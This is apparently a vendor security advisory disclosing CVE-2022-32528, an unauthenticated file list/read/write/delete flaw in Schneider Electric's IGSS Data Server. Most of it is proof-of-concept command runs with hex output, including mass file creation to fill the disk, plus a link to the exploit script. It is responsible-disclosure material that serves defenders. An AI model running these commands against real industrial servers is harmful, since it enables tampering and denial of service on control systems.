Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Schneider Electric IGSS Data Server v15.0.0.22139 Project Report Directory File Manipulation

High

Synopsis

Tenable found a Project Report Directory File Manipulation vulnerability in Schneider Electric IGSS data server (IGSSdataServer.exe) v15.0.0.22052.

An unauthenticated remote attacker can manipulate files in the IGSS project report directory. The attacker can list, read, delete and write files in that directory. With the write file command, the attacker can change the content of an existing file and create a large number of new files to cause a denial-of-service condition (i.e., file system fill up).

List files:

python3 igss_dataserver_file_op.py -t <target> -p 12401 list
Listing *.* in the IGSS project report directory...
res:
00000000: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
00000010: 32 32 30 32 32 33 31 39  2E 4C 4F 47 00 00 00 00  22022319.LOG....
00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000050: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
00000060: 32 32 30 32 32 33 32 30  2E 4C 4F 47 00 00 00 00  22022320.LOG....
00000070: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000080: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000090: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000A0: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
000000B0: 32 32 30 32 32 33 32 31  2E 4C 4F 47 00 00 00 00  22022321.LOG....
000000C0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000D0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000E0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
<...snip...>

Read file:

python3 igss_dataserver_file_op.py -t <target> -p 12401 read -f 22022319.LOG
Reading 22022319.LOG in the IGSS project report directory...
res:
00000000: 00 00 00 00 00 10 00 00  00 00 00 00 05 00 00 00  ................
00000010: EC 0F 00 00 17 00 AA AA  C0 68 06 00 30 30 30 35  .........h..0005
00000020: 30 2D 30 30 2D 58 2D 50  2D 31 2D 30 30 30 30 00  0-00-X-P-1-0000.
00000030: 01 00 00 00 00 B8 74 8E  E7 28 D8 01 20 75 D3 90  ......t..(.. u..
00000040: 67 B7 D6 01 E0 07 00 00  11 00 00 00 00 00 00 00  g...............
<...snip...>

Create a new file, list and read it:

python3 igss_dataserver_file_op.py -t <target> -p 12401 write -f test.txt
Writing 128 random characters to test.txt in the IGSS project report directory...
res:
00000000: 01 00 00 00 50 00 00 00  00 00 00 00 00 00 00 00  ....P...........
00000010: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................

python3 igss_dataserver_file_op.py -t <target> -p 12401 list txt
Listing *.txt in the IGSS project report directory...
res:
00000000: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
00000010: 74 65 73 74 2E 74 78 74  00 00 00 00 00 00 00 00  test.txt........
00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000050: 01 00 00 00 50 00 00 00  00 00 00 00 00 00 00 00  ....P...........
00000060: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000070: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000080: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000090: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................

python3 igss_dataserver_file_op.py -t <target> -p 12401 read -f test.txt
Reading test.txt in the IGSS project report directory...
res:
00000000: 00 00 00 00 94 00 00 00  00 00 00 00 05 00 00 00  ................
00000010: 80 00 00 00 39 50 4E 36  32 47 34 44 35 4F 39 4E  ....9PN62G4D5O9N
00000020: 4E 32 4F 56 33 41 42 46  4A 55 53 49 56 58 31 38  N2OV3ABFJUSIVX18
00000030: 45 57 58 37 4E 4D 54 4D  56 50 38 4F 49 57 53 46  EWX7NMTMVP8OIWSF
00000040: 59 4C 41 31 4F 39 36 41  47 56 41 39 54 58 34 32  YLA1O96AGVA9TX42
00000050: 42 34 48 48 4F 50 48 30  37 47 55 50 41 39 4B 34  B4HHOPH07GUPA9K4
00000060: 52 53 42 48 44 55 36 44  34 4B 5A 4D 58 54 31 45  RSBHDU6D4KZMXT1E
00000070: 32 33 42 49 4B 53 5A 31  33 49 33 53 54 32 31 42  23BIKSZ13I3ST21B
00000080: 4E 31 44 4C 51 31 33 38  5A 30 36 4D 36 49 36 38  N1DLQ138Z06M6I68
00000090: 31 30 36 53 01 00 00 00  50 00 00 00 00 00 00 00  106S....P.......
000000A0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000B0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000C0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000D0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000E0: 00 00 00 00                                       ....

Change an existing file:

python3 igss_dataserver_file_op.py -t <target> -p 12401 write -f test.txt -s 256
Writing 256 random characters to test.txt in the IGSS project report directory...
res:
00000000: 01 00 00 00 50 00 00 00  00 00 00 00 00 00 00 00  ....P...........
00000010: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................

python3 igss_dataserver_file_op.py -t <target> -p 12401 read -f test.txt
Reading test.txt in the IGSS project report directory...
res:
00000000: 00 00 00 00 14 01 00 00  00 00 00 00 05 00 00 00  ................
00000010: 00 01 00 00 44 44 59 32  37 54 45 43 31 59 55 51  ....DDY27TEC1YUQ
00000020: 42 56 32 30 34 30 4B 53  45 45 45 45 32 31 54 54  BV2040KSEEEE21TT
00000030: 33 36 48 46 4D 45 38 5A  4B 31 51 51 45 37 38 58  36HFME8ZK1QQE78X
00000040: 4C 32 30 46 45 45 4F 33  46 36 58 51 4E 37 50 37  L20FEEO3F6XQN7P7
00000050: 38 39 4A 50 4C 43 4A 43  48 57 53 30 4B 34 4C 4D  89JPLCJCHWS0K4LM
00000060: 55 4E 42 52 4A 54 50 56  37 59 37 45 57 50 54 49  UNBRJTPV7Y7EWPTI
00000070: 4B 50 33 4E 39 47 30 36  42 59 39 58 46 55 53 32  KP3N9G06BY9XFUS2
00000080: 38 44 4E 39 30 45 54 4A  38 36 45 54 46 58 45 5A  8DN90ETJ86ETFXEZ
00000090: 39 4A 47 4D 39 43 4D 35  53 5A 41 38 59 35 35 5A  9JGM9CM5SZA8Y55Z
000000A0: 53 38 55 43 4A 36 54 35  30 58 52 4C 34 32 43 34  S8UCJ6T50XRL42C4
000000B0: 4E 48 54 50 4F 45 32 54  44 51 46 37 48 52 37 53  NHTPOE2TDQF7HR7S
000000C0: 4D 49 5A 58 48 30 30 55  38 43 56 36 32 51 5A 5A  MIZXH00U8CV62QZZ
000000D0: 42 49 49 39 36 4A 31 37  52 53 35 4F 44 44 53 58  BII96J17RS5ODDSX
000000E0: 43 37 50 34 42 47 47 54  52 4A 34 50 51 47 57 41  C7P4BGGTRJ4PQGWA
000000F0: 4B 57 30 42 32 56 41 57  42 5A 30 55 43 4F 33 48  KW0B2VAWBZ0UCO3H
00000100: 4E 4A 42 41 50 33 46 36  30 36 32 49 37 49 43 42  NJBAP3F6062I7ICB
00000110: 37 50 35 46 01 00 00 00  50 00 00 00 00 00 00 00  7P5F....P.......
00000120: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000130: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000140: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000150: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000160: 00 00 00 00                                       ....

Delete an existing file:

python3 igss_dataserver_file_op.py -t <target> -p 12401 delete -f test.txt
Deleting test.txt in the IGSS project report directory...
res:
00000000: 01 00 00 00 50 00 00 00  00 00 00 00 00 00 00 00  ....P...........
00000010: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................

python3 igss_dataserver_file_op.py -t <target> -p 12401 list txt
Listing *.txt in the IGSS project report directory...
res:
00000000: 01 00 00 00 50 00 00 00  00 00 00 00 00 00 00 00  ....P...........
00000010: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................

Create x number of files of y size:

python3 igss_dataserver_file_op.py -t <target> -p 12401 write -c 10 -s 200
Creating 10 random file(s) in the IGSS project report directory...
Writing 200 random characters to UT44M7H9E2.XXX in the IGSS project report directory...
Writing 200 random characters to K0LKRKJPRC.XXX in the IGSS project report directory...
Writing 200 random characters to 100UMN9X74.XXX in the IGSS project report directory...
Writing 200 random characters to 0G36NPJMQQ.XXX in the IGSS project report directory...
Writing 200 random characters to QWO1W6GKTI.XXX in the IGSS project report directory...
Writing 200 random characters to 6VZSN5RHHF.XXX in the IGSS project report directory...
Writing 200 random characters to HCGQQPNN71.XXX in the IGSS project report directory...
Writing 200 random characters to LF54X9U6JA.XXX in the IGSS project report directory...
Writing 200 random characters to 5KEYWNKX9V.XXX in the IGSS project report directory...
Writing 200 random characters to 5DVH68B2K0.XXX in the IGSS project report directory...

python3 igss_dataserver_file_op.py -t <target> -p 12401 list xxx
Listing *.xxx in the IGSS project report directory...
res:
00000000: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
00000010: 30 47 33 36 4E 50 4A 4D  51 51 2E 58 58 58 00 00  0G36NPJMQQ.XXX..
00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000050: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
00000060: 31 30 30 55 4D 4E 39 58  37 34 2E 58 58 58 00 00  100UMN9X74.XXX..
00000070: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000080: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000090: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000A0: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
000000B0: 35 44 56 48 36 38 42 32  4B 30 2E 58 58 58 00 00  5DVH68B2K0.XXX..
000000C0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000D0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000E0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000F0: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
00000100: 35 4B 45 59 57 4E 4B 58  39 56 2E 58 58 58 00 00  5KEYWNKX9V.XXX..
00000110: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000120: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000130: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000140: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
00000150: 36 56 5A 53 4E 35 52 48  48 46 2E 58 58 58 00 00  6VZSN5RHHF.XXX..
00000160: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000170: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000180: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000190: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
000001A0: 48 43 47 51 51 50 4E 4E  37 31 2E 58 58 58 00 00  HCGQQPNN71.XXX..
000001B0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000001C0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000001D0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000001E0: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
000001F0: 4B 30 4C 4B 52 4B 4A 50  52 43 2E 58 58 58 00 00  K0LKRKJPRC.XXX..
00000200: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000210: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000220: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000230: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
00000240: 4C 46 35 34 58 39 55 36  4A 41 2E 58 58 58 00 00  LF54X9U6JA.XXX..
00000250: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000260: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000270: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000280: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
00000290: 51 57 4F 31 57 36 47 4B  54 49 2E 58 58 58 00 00  QWO1W6GKTI.XXX..
000002A0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000002B0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000002C0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000002D0: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
000002E0: 55 54 34 34 4D 37 48 39  45 32 2E 58 58 58 00 00  UT44M7H9E2.XXX..
000002F0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000300: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000310: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000320: 01 00 00 00 50 00 00 00  00 00 00 00 00 00 00 00  ....P...........
00000330: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000340: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000350: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000360: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................

Solution

Schneider Electric have released IGSS Data Server V15.0.0.22140 which includes a fix for this vulnerability.

Proof of Concept

https://github.com/tenable/poc/blob/master/SchneiderElectric/IGSS/igss_dataserver_file_op.py

Disclosure Timeline

March 9, 2022 - Vulnerabilities discovered
April 11, 2022 - Vulnerabilities reported to vendor
April 11, 2022 - Vendor assigned case numbers 6392 and 6393
May 27, 2022 - Vendor stated they are finalizing the security notification for case 6393 and expecting disclosure for June
June 7, 2022 - Tenable acknowledged update on case 6393 and requested CVE and fixed version information
June 8, 2022 - Vendor responded that CVE would be assigned at time of disclosure for case 6393
June 14, 2022 - Vendor informed advisory was released for case 6393

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2022-32528
Tenable Advisory ID
TRA-2022-23
CVSSv3 Base / Temporal Score
8.6 / 8.0
CVSSv3 Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
Affected Products
Schneider Electric IGSS Data Server < 15.0.0.22140
Risk Factor
High

Advisory Timeline

June 15, 2022 - Advisory published
tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

tenable.io BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

65 assets

Choose Your Subscription Option:

Buy Now

Try Nessus Professional Free

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy Nessus Professional

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select Your License

Buy a multi-year license and save.

Add Support and Training

Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Tenable.io BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

65 assets

Choose Your Subscription Option:

Buy Now

Try Tenable.io Web Application Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Buy Tenable.io Web Application Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try Tenable.io Container Security

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

Buy Tenable.io Container Security

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

Try Tenable Lumin

Visualize and explore your Cyber Exposure, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Buy Tenable Lumin

Contact a Sales Representative to see how Lumin can help you gain insight across your entire organization and manage cyber risk.

Try Tenable.cs

Enjoy full access to detect and fix cloud infrastructure misconfigurations in the design, build and runtime phases of your software development lifecycle.

Buy Tenable.cs

Contact a Sales Representative to learn more about Cloud Security and how you can secure every step from code to cloud.

Try Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select Your License

Buy a multi-year license and save.

Add Support